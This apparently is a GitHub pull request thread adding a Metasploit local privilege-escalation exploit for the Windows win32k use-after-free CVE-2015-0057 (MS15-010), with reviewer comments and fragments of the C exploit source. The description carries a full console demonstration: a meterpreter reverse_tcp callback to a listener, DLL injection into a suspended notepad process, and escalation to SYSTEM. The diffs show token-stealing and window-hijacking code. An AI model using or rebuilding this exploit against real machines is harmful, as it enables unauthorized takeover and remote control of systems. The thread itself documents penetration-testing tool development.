### PR TITLE
Add exploit for CVE-2015-0057 / MS15-010 SBInfo UAF

### PR DESCRIPTION
**Pull request by zeroSteiner**
This adds a Windows local exploit module for CVE-2015-0057 / MS15-010 which has been referred to as the One-Bit vulnerability. Currently the only target available is for Windows 7 SP1 x86.

This module leverages a UAF vulnerability in xxxEnableWndSBArrows in which the win32k!tagSBINFO structure might be freed and a win32k!tagPROPLIST allocated in it's place. The original [blog](http://breakingmalware.com/vulnerabilities/one-bit-rule-bypassing-windows-10-protections-using-single-bit/) mentioned using the bug to achieve write-what-where however this module uses an alternative approach to set the bServerSideWindowProc flag on an attacker-allocated window.

Demonstration:

```
msf-git (S:0 J:0) exploit(handler) > exploit

[*] [2015.04.22-13:34:31] Started reverse handler on 192.168.90.1:4444
[*] [2015.04.22-13:34:31] Starting the payload handler...
[*] [2015.04.22-13:34:33] Sending stage (882176 bytes) to 192.168.90.152
[*] Meterpreter session 1 opened (192.168.90.1:4444 -> 192.168.90.152:49159) at 2015-04-22 13:34:35 -0400

meterpreter > sysinfo
Computer        : WIN-82GTIDG995P
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: WIN-82GTIDG995P\noob
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > background
[*] Backgrounding session 1...
msf-git (S:1 J:0) exploit(handler) > use exploit/windows/local/ms15_010_sbinfo_uaf
msf-git (S:1 J:0) exploit(ms15_010_sbinfo_uaf) > set SESSION -1
SESSION => -1
msf-git (S:1 J:0) exploit(ms15_010_sbinfo_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf-git (S:1 J:0) exploit(ms15_010_sbinfo_uaf) > set LHOST 192.168.90.1
LHOST => 192.168.90.1
msf-git (S:1 J:0) exploit(ms15_010_sbinfo_uaf) > exploit

[*] [2015.04.22-13:35:09] Started reverse handler on 192.168.90.1:4444
[*] [2015.04.22-13:35:10] win32k.sys file version: 6.1.7601.18388 branch: 18
[*] [2015.04.22-13:35:10] Launching suspended notepad to host the exploit...
[+] [2015.04.22-13:35:11] Process 2624 launched.
[*] [2015.04.22-13:35:11] Reflectively injecting the exploit DLL into 2624...
[*] [2015.04.22-13:35:11] Injecting exploit into 2624...
[*] [2015.04.22-13:35:11] Exploit injected. Injecting payload into 2624...
[*] [2015.04.22-13:35:11] Payload injected. Executing exploit...
[*] [2015.04.22-13:35:11] Sending stage (882176 bytes) to 192.168.90.152
[+] [2015.04.22-13:35:11] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.90.1:4444 -> 192.168.90.152:49160) at 2015-04-22 13:35:13 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

Verification steps:
- [ ] Get a meterpreter session on Windows 7 SP1 x86 as an under-privileged user
- [ ] View the module information for MS15-010 to ensure it makes sense
- [ ] Run the exploit and get a SYSTEM level session
- [ ] Check that the original non-privileged session continues to function

Thanks for reading!

### CODE REVIEW

File: external/source/exploits/make.bat [hunk 1]
```diff
@@ -55,6 +55,13 @@ IF "%ERRORLEVEL%"=="0" (
 )
 
 IF "%ERRORLEVEL%"=="0" (
+  ECHO "Building CVE-2016-0057 (sbinfo_uaf)"
```
Comment (OJ) [inline external/source/exploits/make.bat]: Should this be `2015` ? :)

File: external/source/exploits/cve-2015-0057/make.msbuild [hunk 2]
```diff
@@ -0,0 +1,13 @@
+<?xml version="1.0" standalone="yes"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <SolutionPath>.\cve-2015-0057.sln</SolutionPath>
+  </PropertyGroup>
+
+  <Target Name="all" DependsOnTargets="x86" />
```
Comment (OJ) [inline external/source/exploits/cve-2015-0057/make.msbuild]: We'll need to add `x64` here, with a message that says "Not supported".

**Comment by OJ** [comment]
This looks great @zeroSteiner! I reckon we'll get this landed and then look to add more targets later, including X64.

Good stuff mate.

File: external/source/exploits/cve-2015-0057/cve-2015-0057/cve-2015-0057.c [hunk 3]
```diff
@@ -0,0 +1,519 @@
...
+ * MS15-010 / CVE-2015-0057 win32k!xxxEnableWndSBArrows Use After Free
+ *
+ * Authors:
+ *   Udi Yavo (Vulnerability discover and details)
+ *   Spencer McIntyre (Exploit)
+ *
+ * References:
+ *   http://breakingmalware.com/vulnerabilities/one-bit-rule-bypassing-windows-10-protections-using-single-bit/
+ *   https://technet.microsoft.com/en-us/library/security/ms15-010.aspx
+ */
```
Comment (OJ) [inline external/source/exploits/cve-2015-0057/cve-2015-0057/cve-2015-0057.c]: To be picky, can we use the Doxygen style comments like we do in Meterpreter, pretty please? :)
```
/*~
 * @brief MS15-010 / CVE-2015-0057 win32k!xxxEnableWndSBArrows Use After Free
 * @author Udi Yavo (Vulnerability discover and details)
 * @author Spencer McIntyre (Exploit)
 * @remark Details can be found at http://breakingmalware.com/vulnerabilities/one-bit-rule-bypassing-windows-10-protections-using-single-bit/
 *         and https://technet.microsoft.com/en-us/library/security/ms15-010.aspx
 */
```

File: external/source/exploits/cve-2015-0057/cve-2015-0057/cve-2015-0057.c [hunk 4]
```diff
@@ -0,0 +1,519 @@
...
+
+// Search the specified data structure for a member with CurrentValue.
+BOOL find_and_replace_member(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize)
+{
+	DWORD_PTR dwIndex, dwMask;
+
+	// Microsoft QWORD aligns object pointers, then uses the lower three
+	// bits for quick reference counting.
+#ifdef _M_X64
+	dwMask = ~0xf;
```
Comment (OJ) [inline external/source/exploits/cve-2015-0057/cve-2015-0057/cve-2015-0057.c]: A sign that x64 is coming.. 
Excellent

File: external/source/exploits/cve-2015-0057/cve-2015-0057/cve-2015-0057.c [hunk 5]
```diff
@@ -0,0 +1,519 @@
...
+		0x200);
+	return;
+}
+
+LRESULT CALLBACK wnd_proc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam)
+{
+	WORD um = 0;
+	__asm {
+		mov ax, cs
+			mov um, ax
```
Comment (OJ) [inline external/source/exploits/cve-2015-0057/cve-2015-0057/cve-2015-0057.c]: very small indenting issue here.

File: external/source/exploits/cve-2015-0057/cve-2015-0057/cve-2015-0057.c [hunk 6]
```diff
@@ -0,0 +1,519 @@
...
+	}
+	if (um == 0x1b) {
+		return DefWindowProc(hWnd, msg, wParam, lParam);
+	}
+	else if (g_bStealDatToken) {
```
Comment (OJ) [inline external/source/exploits/cve-2015-0057/cve-2015-0057/cve-2015-0057.c]: No `else` required here as previous condition contains a `return`.

File: external/source/exploits/cve-2015-0057/cve-2015-0057/cve-2015-0057.c [hunk 7]
```diff
@@ -0,0 +1,519 @@
...
+	g_bStealDatToken = TRUE;
+	if (SendMessage(hTemp, (WM_USER + 1), 0x1337, 0x1337) == ~0x1337) {
+		dprintf("[+] SendMessage WM_USER + 1 succeeded");
+	}
+	else {
+		dprintf("[!] SendMessage failed: %i, window might be corrupt", GetLastError());
+		return FALSE;
+	}
+
+	if (g_bStealDatToken == FALSE) {
```
Comment (OJ) [inline external/source/exploits/cve-2015-0057/cve-2015-0057/cve-2015-0057.c]: perhaps just
``` c
return !g_bStealDatToken;
```
Love the var name.

File: external/source/exploits/cve-2015-0057/cve-2015-0057/cve-2015-0057.c [hunk 8]
```diff
@@ -0,0 +1,519 @@
...
+	versionInfo.dwOSVersionInfoSize = 148;
+
+	if (!GetVersionExA(&versionInfo))
+	{
+		dprintf("[!] Failed to get windows version");
+		return;
+	}
+
+	/* collapse this code */
+	if (TRUE) {
```
Comment (OJ) [inline external/source/exploits/cve-2015-0057/cve-2015-0057/cve-2015-0057.c]: Is this just for the sake of editor folding?

**Comment by OJ** [comment]
There are some other small nitpicks but as always, your work is great @zeroSteiner. I'll get testing this later on.

**Comment by OJ** [comment]
Quick initial test doesn't result in a shell here mate. Here's my version:
```
[*] win32k.sys file version: 6.1.7601.18512 branch: 18
```
This machine hasn't been patched this year, but it's obviously not the same as the one you have. Will look into it a bit later. Cheers!

File: external/source/exploits/cve-2015-0057/cve-2015-0057/cve-2015-0057.c (hunk 8 above)
Comment (zeroSteiner) [inline external/source/exploits/cve-2015-0057/cve-2015-0057/cve-2015-0057.c]: That's correct. The block is almost entirely copy pasta, so folding it makes navigating to the sections relevant to the exploit easier. Is there an alternative approach that would be preferred, perhaps making it into a function?

**Comment by zeroSteiner** [comment]
@OJ I implemented all of your feedback and pushed up the changes. Thanks for the review! My guess is that the window allocations are not aligning correctly on other systems, this is something I can try to look into a bit more. To clarify, you do not get a SYSTEM shell or a BSOD correct, ie it's failing gracefully?

**Comment by OJ** [comment]
@zeroSteiner Correct dude, no BSOD to be seen, it fails gracefully.

**Comment by OJ** [comment]
Thanks @zeroSteiner I had another play with this and it consistently fails on my machine, but no breakages/BSoDs. When I get the time, I'll fiddle with the window allocations and see what I can come up with. Thanks mate!

**Comment by OJ** [comment]
BTW, if I `#define DEBUGGING` in `khelpers.h` then the binary to run. FYI mate ;)

**Comment by zeroSteiner** [comment]
I'm seeing the same issue when defining ```DEBUGGING``` in khelpers.h while using the Release configuration. Do you get the same problem when using the Debug configuration? The Debug configuration should set the DEBUGGING preprocessor definition for you.

**Comment by zeroSteiner** [comment]
I adjusted the ```MAX_ALLOCATION_ATTEMPTS``` to try more iterations to hopefully increase the changes of a successful allocation.

**Comment by OJ** [comment]
I'll give this another look at some point today mate.

**Comment by hmoore-r7** [comment]
@zeroSteiner I think OJ planned to retest this, is there some reason you closed this?

**Pull request closed without merging**